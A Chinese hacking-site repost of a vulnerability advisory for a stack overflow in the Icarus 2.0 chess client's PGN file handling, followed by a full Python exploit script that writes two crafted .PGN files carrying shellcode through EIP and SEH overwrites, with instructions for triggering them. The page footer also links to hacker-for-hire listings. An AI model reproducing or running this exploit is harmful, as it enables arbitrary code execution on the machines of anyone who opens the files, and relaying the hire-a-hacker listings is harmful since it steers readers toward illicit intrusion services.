Icarus PGN文件处理栈溢出漏洞

访客4年前关于黑客接单557

影响版本:
Random Software Icarus 2.0
漏洞描述:
BUGTRAQ  ID: 34167

Icarus是在线国际象棋游戏Internet Chess Club所使用的界面。

如果用户使用Icarus打开了特制的Portable Game Notation(*.pgn)文件的话,就可能触发栈溢出,导致执行任意代码。<*参考
http://secuni *** /advisories/34368/
*>
SEBUG安全建议:
厂商补丁:

Random Software
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.randomly.com/apps/icarus/index-en.html
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
#usage: exploit.py
print \"********************************************************************\"
print \" Icarus 2.0 Local Stack Overflow Exploit\\n\"
print \" Download: http://www.randomsoftware.com/pub/icarus.exe\"
print \" Author : His0k4\"
print \" Tested on: Windows XP Pro SP2 Fr\\n\"
print \" Greetings to:\"
print \" All friends & muslims HaCkers(dz)\\n\"
print \" Tip of the day: Klimontayne fe romayne :D\"
print \"********************************************************************\\n\\n\"

    
payload1 =   \"\\x41\" * 336
payload1 +=  \"\\x5D\\x38\\x82\\x7C\" # call esp kernel32.dll (sp2)
payload1 +=  \"\\x90\" * 19 #some nops
payload1 +=  \"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x38\"
payload1 +=  \"\\x4e\\xf9\\x9f\\x83\\xeb\\xfc\\xe2\\xf4\\xc4\\xa6\\xbd\\x9f\\x38\\x4e\\x72\\xda\"
payload1 +=  \"\\x04\\xc5\\x85\\x9a\\x40\\x4f\\x16\\x14\\x77\\x56\\x72\\xc0\\x18\\x4f\\x12\\xd6\"
payload1 +=  \"\\xb3\\x7a\\x72\\x9e\\xd6\\x7f\\x39\\x06\\x94\\xca\\x39\\xeb\\x3f\\x8f\\x33\\x92\"
payload1 +=  \"\\x39\\x8c\\x12\\x6b\\x03\\x1a\\xdd\\x9b\\x4d\\xab\\x72\\xc0\\x1c\\x4f\\x12\\xf9\"
payload1 +=  \"\\xb3\\x42\\xb2\\x14\\x67\\x52\\xf8\\x74\\xb3\\x52\\x72\\x9e\\xd3\\xc7\\xa5\\xbb\"
payload1 +=  \"\\x3c\\x8d\\xc8\\x5f\\x5c\\xc5\\xb9\\xaf\\xbd\\x8e\\x81\\x93\\xb3\\x0e\\xf5\\x14\"
payload1 +=  \"\\x48\\x52\\x54\\x14\\x50\\x46\\x12\\x96\\xb3\\xce\\x49\\x9f\\x38\\x4e\\x72\\xf7\"
payload1 +=  \"\\x04\\x11\\xc8\\x69\\x58\\x18\\x70\\x67\\xbb\\x8e\\x82\\xcf\\x50\\xbe\\x73\\x9b\"
payload1 +=  \"\\x67\\x26\\x61\\x61\\xb2\\x40\\xae\\x60\\xdf\\x2d\\x98\\xf3\\x5b\\x4e\\xf9\\x9f\"
junk     =   \"\\xCC\"*7000


payload2 =  \"\\x5B\\x46\\x6F\\x72\\x6D\\x61\\x74\\x20\\x22\\x4C\\x65\\x63\\x74\\x75\\x72\\x65\\x22\\x5D\"
payload2 +=  \"\\x0A\\x5B\\x54\\x69\\x74\\x6C\\x65\\x20\\x22\\x65\\x78\\x70\\x6C\\x6F\\x69\\x74\\x22\\x5D\"
payload2 +=  \"\\x0A\\x0A\"
payload2 +=  \"\\x41\"*788
payload2 +=  \"\\xEB\\x06\\x90\\x90\" # jmp +6
payload2 +=  \"\\xE9\\x10\\x37\\x01\" # universal pop pop ret
payload2 +=  \"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x38\"
payload2 +=  \"\\x4e\\xf9\\x9f\\x83\\xeb\\xfc\\xe2\\xf4\\xc4\\xa6\\xbd\\x9f\\x38\\x4e\\x72\\xda\"
payload2 +=  \"\\x04\\xc5\\x85\\x9a\\x40\\x4f\\x16\\x14\\x77\\x56\\x72\\xc0\\x18\\x4f\\x12\\xd6\"
payload2 +=  \"\\xb3\\x7a\\x72\\x9e\\xd6\\x7f\\x39\\x06\\x94\\xca\\x39\\xeb\\x3f\\x8f\\x33\\x92\"
payload2 +=  \"\\x39\\x8c\\x12\\x6b\\x03\\x1a\\xdd\\x9b\\x4d\\xab\\x72\\xc0\\x1c\\x4f\\x12\\xf9\"
payload2 +=  \"\\xb3\\x42\\xb2\\x14\\x67\\x52\\xf8\\x74\\xb3\\x52\\x72\\x9e\\xd3\\xc7\\xa5\\xbb\"
payload2 +=  \"\\x3c\\x8d\\xc8\\x5f\\x5c\\xc5\\xb9\\xaf\\xbd\\x8e\\x81\\x93\\xb3\\x0e\\xf5\\x14\"
payload2 +=  \"\\x48\\x52\\x54\\x14\\x50\\x46\\x12\\x96\\xb3\\xce\\x49\\x9f\\x38\\x4e\\x72\\xf7\"
payload2 +=  \"\\x04\\x11\\xc8\\x69\\x58\\x18\\x70\\x67\\xbb\\x8e\\x82\\xcf\\x50\\xbe\\x73\\x9b\"
payload2 +=  \"\\x67\\x26\\x61\\x61\\xb2\\x40\\xae\\x60\\xdf\\x2d\\x98\\xf3\\x5b\\x4e\\xf9\\x9f\"
payload2 +=  \"\\xCC\"*7000

try:
    out_file = open(\"exploit_eip.PGN\",\'w\')
    out_file.write(payload1+junk)
    out_file.close()
    print \"Eip exploit File Created!\\nNow you can run this file directly\\n\"
except:
    print \"Error\"
try:
    out_file = open(\"exploit_seh.PGN\",\'w\')
    out_file.write(payload2)
    out_file.close()
    print \"Seh exploit File Created!\\nOpen Icarus then game>load and chose exploit_seh.PGN\\n\"
except:
    print \"Error\"


标签: 好话题

相关文章

iphone手机通话记录没有了怎么恢复_新浪微博

iphone手机通话记录没有了怎么办 4.如果您找不到上面所说的路径或找不到logs.db文件的话,请在RE管理器中进入到“/data/data/com.android.providers.conta...

点击欺诈成为勒索软件攻击的入口路径_挖矿

黑客正在使用点击欺诈,这是反复点击网络广告以消除广告客户收入的行为,这是分发勒索软件的最常见方式。这是根据威胁检测公司Damballa的2015年第二季度 感染状况报告,该报告分析了由Asprox僵尸...

黑客安全网 - 专业的IT技术学习接单网站_网络安全/网赚论坛/黑客防御

黑客安全网/专业的IT技术学习接单网站/网络安全/网赚论坛/黑客防御...

淘宝有黑客接单暗号(先做事后收款黑客团队业务)

淘宝有黑客接单暗号(先做事后收款黑客团队业务)

新型Mirai僵尸网络变种,利用漏洞攻击Comtrend品牌路由器。 Mirai最初于2016年出现,其源代码于同年10月在线发布,现已成为众多DDos攻击的源头。其中仅在过去的几个月中就出现...

24小时接单的顶级黑客这里可以找到

24小时接单的顶级黑客这里可以找到

谷歌母公司Alphabet 的生命科学部门Verily表示,他们将保留一项要求,暨冠状病毒检测网站的访问者必须使用Google账户登录。自上个月该网站启动以来,这项决定受到了严格审查。 Ver...

开房记录可以查到吗?

其实我们在日常生活当中总会担心这样那样的问题,怕自己一不小心就做错了傻事儿。前段时间我的闺蜜就同我分享了这么一件事情,她说自己一不小心和一个异性朋友去酒店开了房间,但是她的异性朋友是有女朋友的,然而两...